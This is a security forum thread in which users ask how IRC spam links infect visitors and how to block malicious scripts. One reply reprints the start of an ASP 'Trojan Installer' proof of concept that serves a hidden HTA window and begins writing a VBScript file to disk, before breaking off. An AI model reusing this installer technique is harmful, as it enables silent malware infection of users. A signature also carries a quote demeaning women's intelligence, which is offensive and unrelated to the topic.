"IRC" virii?
Results 1 to 5 of 5

Thread: "IRC" virii?

  1. #1
    Banned
    Join Date
    May 2003
    Posts
    210

    "IRC" virii?

    Chances are, if you are a user of a large IRC network (such as DAL and EFnet), you will know what im talking about.

    Usually a user spams a website (eg: <sexc69> *** see me on webcam @ http://www.geocities.com/infected_site) to other users. The users, not knowing any better, click on the link and are infected -- they start spreading the link as well, usually without their knowledge.

    Although i have had contact with these things for quite a while, i have never actually "lived on the edge" and visited the spammed websites. I was wondering then, exactly *how* does the client (usually mIRC) get infected through a simple click? Or have i missed something?

    Regards

  2. #2
    Senior Member Syini666's Avatar
    Join Date
    Aug 2001
    Posts
    551
    Most likely the site contains malicious code such as Java/JavaScript to attack the computer and get the virus onto the system. It can then join irc servers and propagate itself in the very same fashion. A rather unexperienced user wouldnt really notice it, unless they had a firewall and could see the IRC traffic to servers they dont normally use. Another downside to these virii is that they can be designed to create a network for a DDoS attack, so not only has your computer become infected with a virus, but its now being used to attack someone else and you get left holding the short end of the stick.
    You're not your post count, You're not your avatar or sig, You're not how fast your internet connection is, You are not your processor, hard drive, or graphics card. You're the all-singing, all-dancing crap of AO
    09 F9 11 02 9D 74 E3 5B D8 41 56 C5 63 56 88 C0

  3. #3
    Banned
    Join Date
    May 2003
    Posts
    210
    Thanks,

    I thought that it might have something to do with Java/Javascript, but as i have never 'played' with it, i wouldnt know. Are there any effective ways to block malicious Java code (without disabling Javascript in the browser?)

  4. #4
    Senior Member
    Join Date
    Nov 2001
    Posts
    4,786
    they're constantly making patches to block malicious javas scripts but new malicious scripts are written almost as fast which exploit new holes found in browser security which lately come out even faster.

    if you plan to surf sites you dont know disable java scripts

    Here's part of a malicious page that uses asp:


    <%
    ' Trojan Installer Written By Ethics
    ' Simple exploit of the Object tag
    ' Just put this file as the "data" value in an object tag

    '-----------------------------------------------
    ' make sure Nothing has gone to the client
    response.clear
    response.contenttype="application/hta"
    %>
    <HTML>
    <HEAD>
    <TITLE></TITLE>
    <HTA:APPLICATION ID="PsyBot"
    APPLICATIONNAME="PsyBotInstaller"
    BORDER="none"
    BORDERSTYLE="normal"
    CAPTION="no"
    ICON=""
    CONTEXTMENU="no"
    MAXIMIZEBUTTON="yes"
    MINIMIZEBUTTON="yes"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"/>

    <SCRIPT LANGUAGE="VBScript">
    MyFile = "c:\me.vbs"
    Set FSO = CreateObject("Scripting.FileSystemObject")
    ...and the rest of the code

    even though its published as a 'proof of concept' (PoC) it can still do a lot of damage
    Bukhari:V3B48N826 “The Prophet said, ‘Isn’t the witness of a woman equal to half of that of a man?’ The women said, ‘Yes.’ He said, ‘This is because of the deficiency of a woman’s mind.’”

  5. #5
    Banned
    Join Date
    May 2003
    Posts
    210
    Thanks for the example and information, Tedob1/Syni666

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •  

 Security News

     Patches

       Security Trends

         How-To

           Buying Guides